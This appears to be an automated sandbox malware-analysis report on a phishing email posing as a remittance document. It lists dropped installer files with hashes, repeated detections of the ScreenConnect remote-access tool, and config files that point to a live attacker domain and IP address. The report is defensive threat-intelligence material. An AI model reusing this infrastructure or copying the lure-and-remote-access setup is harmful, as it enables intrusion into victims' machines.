                                      MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                      SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                      SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                      SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Reputation:unknown
                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):20480
                                      Entropy (8bit):1.171383762995406
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:CDED9E65B7E443BF23325FE5415D0357
                                      SHA1:E6B781E600C903FCEBD3FF6CF7D26344F913E185
                                      SHA-256:9E6A067A7D63B06021886CB0387389A666D7109A98FEBF651DB1F28B67AC9598
                                      SHA-512:B85747C8D44F48F900412F71F118BCE990C2665BAB66B06C8D5CEBB31776FB23BD1B6EC7F46425A276B9D98EBEA802B8345465CACCF767943B5EE4F55B014A5D
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):20480
                                      Entropy (8bit):1.814724129641439
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:7BFA01F444629C5E950C3BEF11340CBD
                                      SHA1:39A5DDC25F78A031373F4108C9DF06BE99286586
                                      SHA-256:7A907F97DBB3FDC1BAEDD5E21321D0E07B904DBBEC7289FCF3A71AA054889C64
                                      SHA-512:9309A3EF52D18AA962485DB1A09436DDD2FACC372D8501089B63B8894B6EE87AF7B122983A3B6698DD3AA455001149520063994226AF13B4D1B32F7004B9CA6F
                                      Malicious:false
                                      Yara Hits:
                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\inprogressinstallinfo.ipi, Author: Joe Security
                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\inprogressinstallinfo.ipi, Author: Joe Security
                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\inprogressinstallinfo.ipi, Author: Joe Security
                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\inprogressinstallinfo.ipi, Author: Joe Security
                                      Reputation:unknown
                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 16 x 16, 8-bit colormap, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 32 x 32, 1-bit colormap, non-interlaced, 4 bits/pixel
                                      Category:dropped
                                      Size (bytes):435
                                      Entropy (8bit):5.289734780210945
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:F34D51C3C14D1B4840AE9FF6B70B5D2F
                                      SHA1:C761D3EF26929F173CEB2F8E01C6748EE2249A8A
                                      SHA-256:0DD459D166F037BB8E531EB2ECEB2B79DE8DBBD7597B05A03C40B9E23E51357A
                                      SHA-512:D6EEB5345A5A049A87BFBFBBBEBFBD9FBAEC7014DA41DB1C706E8B16DDEC31561679AAE9E8A0847098807412BD1306B9616C8E6FCFED8683B4F33BD05ADE38D1
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:..............z...6... ..............00..........0....PNG........IHDR.............(-.S....PLTE....22.u......tRNS.@..f..."IDATx.c` .0"...$.(......SC..Q8....9b.i.Xa.....IEND.B`..PNG........IHDR... ... .....I......PLTE....22.u......tRNS.@..f...(IDATx.c`...... ... D.......vb.....A`..(.-s...q....IEND.B`..PNG........IHDR...0...0.....m.k.....PLTE....22.u......tRNS.@..f...+IDATx.c` .......Q...S.@..DQu...4...(.}DQD...3x........IEND.B`.
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):454234
                                      Entropy (8bit):5.3561572370285395
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:3146CE656A2C06805CAADE0680377FC7
                                      SHA1:3373929A8B7C7E14CEA36B60ABA88D8A86DC8A92
                                      SHA-256:239F59AC2DB670446308E96FE9D4F03DBA0C7BE01FEDC181AB70DB2727A86E33
                                      SHA-512:062F5C75E5DC0EE4CA1FB2A60DD1373C0A221C63EEA06F23719D44C912998FDFA67A77A84EAF0BAD2934F4B74C189F3E7F26E3208FA6795E1A2E1CFB2AACAB6E
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                      Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):4926
                                      Entropy (8bit):3.2482637276968966
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:EA0734C2443099AEA731044D975FC7BE
                                      SHA1:41D5A44A6B6764A75BF07A4147A27B27379FF143
                                      SHA-256:EB8A7562533B63EF84515A78E1620670F348F8A26BEEC0F2B2ED04497BD4333D
                                      SHA-512:4416610DCB8AE6335A3D014414FB6ACDCA13CA0A7F520FE05650494D62CD4A111ED1A1E10471F48774A63A2080AAE4AA8D4FB6129D2F90446DC3C67028E5D7F6
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. O.c.t. .. 0.6. .. 2.0.2.3. .1.1.:.3.5.:.2.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.
                                      Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):566
                                      Entropy (8bit):5.038118758749988
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:A69C84446C3C89756D06AEA5C426AD86
                                      SHA1:27DFAA7BA7F9B0CBD443A9AFA1488B4BE84F5ACE
                                      SHA-256:5E01AD50B6FC095544CE0FE4FE2CA507E8A83976AE3D281414BCEAF3AAF595DA
                                      SHA-512:FA26EFB102481CF6D313E897D0AE864A325CCB76DB5821616EA6C3A8E77E7D0F42E8AB733852486B9AEBCDD1148FC203776FDE03FE176C343B026FA425F59263
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-17%2f01%2f2025%2017%3a46%3a06</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                      Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):566
                                      Entropy (8bit):5.0361692834005884
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:4041FAA5AEF3FB67A0C8B5B8FCF61B14
                                      SHA1:2797A273CC7D087E6801A471C3ACDAC30EF95815
                                      SHA-256:546AB361F9F859656BECDB535D018F88C04D003AB22D0E7DD7CE55A80685B8B7
                                      SHA-512:4304E089AC30E51D917227F3C6F5D207325986B7BCB1EA0928B1378F56D44EDC163C8F6F6A5BAED3520A30D6A8F3D5FEA0DDFD8850970D748DFE9B1B23180DDA
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-17%2f01%2f2025%2017%3a46%3a12</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                      Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):566
                                      Entropy (8bit):5.034339667782819
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:AC4FA08CC4EC1BEA3A1309317A8845EA
                                      SHA1:A3EF527FF54AFCB94F74E75850C36A5624D4131C
                                      SHA-256:4EBD07A2C0B43E326167E635CAA262CA2F199068DDED972DA72D0BCAE016FEED
                                      SHA-512:E122A09A80B1DB5501BCF31D0C8ACC6A19AF919A16EDDCAA94B3CAA58960CD46F33A0CEC8EEC9C60EF5280F3A1A3583C3BA898F915BEA3C5F0D086FA105DE7B4
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-17%2f01%2f2025%2017%3a48%3a10</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                      Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):566
                                      Entropy (8bit):5.035451311745877
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:771C16ED1F445901B791A900BECA18C4
                                      SHA1:CF9BE8B8A9A4F02D33025863CFDB753573F28F8B
                                      SHA-256:82E9BD71255367992581F0993C3AA189BCF204CBE3388ECB1F7490E57FC51084
                                      SHA-512:ABB208F6178C45621E34B44CD71CA663643530337DD079D25BB54B39F9AEC79F5E8F8FE9A6ECC83A478774B36042E7779B5B141EC04F7D60D3928489F470C192
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-17%2f01%2f2025%2017%3a47%3a04</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                      Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):566
                                      Entropy (8bit):5.0369614760078445
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:DAB1A0AEBAC32F9898E18D8932E12250
                                      SHA1:DB2F3EFE5F16C091AFE294EBE11A3712D24A84C8
                                      SHA-256:5F9B5032506F74F39846A78A272B77E7541E8FD8A66ED51B3666067AD389205F
                                      SHA-512:8177CD210AFCE4C5D52C35EB6056A653B3B158FB0C76960D41D62AAD0235DDD07D4F4BCC46A1F881AFDCFC0F263EB039EB01D3ED8E7B3BB6D8161DF77352B2B7
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-17%2f01%2f2025%2017%3a47%3a19</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                      Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):566
                                      Entropy (8bit):5.038984880650471
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:B4E5BC8DFF3608C5C4B11E0E20949480
                                      SHA1:2512353D757FD5731417843E40AB58F9E5E3CE19
                                      SHA-256:D363039936171F8742734FFF3F318691DE3A4CA1999F013C05399F8781146628
                                      SHA-512:B4FA941DDE7E6E877B3312BAC914FA4AE37727314EA97B829F1C54D9CC9C67DE96FDA1CBE985D09F623534F2FD431C6FF1D8E1D2EDB2C396D951467EAA632A2D
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-17%2f01%2f2025%2017%3a46%3a09</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                      Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):566
                                      Entropy (8bit):5.037794167744306
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:F7586B7FD14B4CC81706197B6592BD76
                                      SHA1:D97ADC27DD7F8CB74A15260C84CE2B90E0751012
                                      SHA-256:C08CD6A4B9B4DA3DF20BD0ECB8D0D4E8756AF818A669783F21B0D0E64CD6777A
                                      SHA-512:A8FB4221249C1299D413E36C7D4351202F5E67387169B75AB17193423D816BFF427515E8C7263F9F475BD7752D83456B85BF5D3D7B97B8BB578CA2504AB6B7C3
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-17%2f01%2f2025%2017%3a46%3a52</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                      Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):566
                                      Entropy (8bit):5.039743643093706
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:164444836287E237AAA2EF022FC4CBCC
                                      SHA1:A71C086FA8659A9412EE45FC5BBE071A43700D1C
                                      SHA-256:6CF91E755EABF734B608B0A1355EFF349C808BD91F42569EFFF60018BC1762B4
                                      SHA-512:F5CBEFE9189A277AD9D85DA21F5C13C72884149E04CBA1EB27CF25C5406ADA98D791B8496C698114BCA55F4EAAB6467DBAB87BFAFE3B03F06B09D220C4BE36E9
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-17%2f01%2f2025%2017%3a46%3a46</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                      Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):0
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:A69C84446C3C89756D06AEA5C426AD86
                                      SHA1:27DFAA7BA7F9B0CBD443A9AFA1488B4BE84F5ACE
                                      SHA-256:5E01AD50B6FC095544CE0FE4FE2CA507E8A83976AE3D281414BCEAF3AAF595DA
                                      SHA-512:FA26EFB102481CF6D313E897D0AE864A325CCB76DB5821616EA6C3A8E77E7D0F42E8AB733852486B9AEBCDD1148FC203776FDE03FE176C343B026FA425F59263
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-17%2f01%2f2025%2017%3a46%3a06</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                      Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):566
                                      Entropy (8bit):5.037076196089595
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:3E600B7ABF43AFC106720BD5D52694F7
                                      SHA1:DCCF900670D386995E9CF6E723DFD22073A18DAC
                                      SHA-256:F3B635F4ADB11B13D0BDF458BC5D0578D28663B604E1845A63757FC9DF3ADEB8
                                      SHA-512:0ED774CA7FD5A6C6606E59608896CF5D99444F63730F0EB5F4DEA099068BE068819C4FFFC42C6ABBA53C35CD0A7005C3ADFF7648A079653AEED91C55ADEB6F93
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-17%2f01%2f2025%2017%3a47%3a38</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):69632
                                      Entropy (8bit):0.2397701231948343
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:9816929C32B8105E15761671588DA63B
                                      SHA1:3AF70915A0593B1F6EBA9805DEC251ED3DBE3D1B
                                      SHA-256:1FCFEBFEAAFF4CDA621A3E2CD2B28DF992ECFDB4F23DFA02CF064B55027A2253
                                      SHA-512:286C5FB1EDDA30CAB469475EEC084A35EA3519671BFA63AFCD72A818BB158CD4244387CA01CF2D4493498F2ECE65492D113956F5C7F907C6D791658FD113BB06
                                      Malicious:false
                                      Yara Hits:
                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF61B1AA59FC6BE6BD.TMP, Author: Joe Security
                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF61B1AA59FC6BE6BD.TMP, Author: Joe Security
                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF61B1AA59FC6BE6BD.TMP, Author: Joe Security
                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF61B1AA59FC6BE6BD.TMP, Author: Joe Security
                                      Reputation:unknown
                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):32768
                                      Entropy (8bit):1.4307336157502095
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:D7781C91160877A12EFD29061052FD78
                                      SHA1:6E72E09AC1CC059D446FD8963705B249BA83F391
                                      SHA-256:49EE527814EDE083951650D7624B707ADD67121C523186A0161B053E1769F5E6
                                      SHA-512:55C32F3C755BE459EB38249ABAD3B399FFFB01316EE023021CE5CCB0795A22B438F6F49B95EB324440A8F9F7171C8FB876898F4B6EC06DB3C0B9D9B10B1FDDF2
                                      Malicious:false
                                      Yara Hits:
                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFCA0C09BBD88D1D46.TMP, Author: Joe Security
                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFCA0C09BBD88D1D46.TMP, Author: Joe Security
                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFCA0C09BBD88D1D46.TMP, Author: Joe Security
                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFCA0C09BBD88D1D46.TMP, Author: Joe Security
                                      Reputation:unknown
                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):32768
                                      Entropy (8bit):0.07711938283556939
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:986022377C73CC37C30421F911D9E991
                                      SHA1:51F14FDF1946882678D8FEB1617DC3D55B45BA13
                                      SHA-256:A884F469EE2352333AA8C929FA29A49D837A89B6D04F48BD2EEC5DFC6AE66251
                                      SHA-512:878D147328DB6F233475A88B8C1B09107C41DD252A5DF41E9ABD22E09398E7D45543BB347436FB60E6D5223D0E02F4E6F0CF7EA761ACCD7D6DBD1D1B8B3D5C30
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):512
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      File type:RFC 822 mail, ASCII text, with very long lines (347), with CRLF line terminators
                                      Entropy (8bit):6.106581030553231
                                      TrID:
                                      • E-Mail message (Var. 5) (54515/1) 100.00%
                                      File name:phish_alert_iocp_v1.4.48 - 2025-01-17T094354.785.eml
                                      File size:43'591 bytes
                                      MD5:845e539d744aa9d873fcc78322e23aab
                                      SHA1:1a4f474055762a0e8aaed2262e185d0742bcc7e3
                                      SHA256:7f25bc02b8648f3ed9a3597d965ec56801f2e0a5735498f900e3a517b6294b0e
                                      SHA512:201e21a3df73933956659efda5c2508fc854df36c38b3322bc239d99c10f6ae5eac456c8ff4ee69933687ff4155497e519dcc2f91b2b595bcc34d9a3b98cc0cb
                                      SSDEEP:768:vjDS6JTx7xHWzvv/CNiBgXQkaVAjBvnaAgeY7NCibJSDiqbKYlvSEbqZ:vjlP7xHWzvv/Ai6Xi4aABA/SD/1SEbqZ
                                      TLSH:4D136CCBA90510A9F73101C8AF04BBCCA759BEDEEEE4E8E5720623338D4743252557DA
                                      File Content Preview:Received: from SJ0PR22MB3851.namprd22.prod.outlook.com.. (2603:10b6:a03:4ea::9) by SN4PR22MB2854.namprd22.prod.outlook.com with.. HTTPS; Fri, 17 Jan 2025 17:15:52 +0000..ARC-Seal: i=2; a=rsa-sha256; s=arcselector10001; d=microsoft.com; cv=pass;.. b=v1aY6R
                                      Subject:Completed: Please Review Remittance eDocument_PrintScan_1962.pdf
                                      From:Daniel Wintner <danielw@thearbagroup.com>
                                      To:Daniel Wintner <danielw@thearbagroup.com>
                                      Cc:
                                      BCC:
                                      Date:Thu, 16 Jan 2025 04:57:06 -0800
                                      Communications:
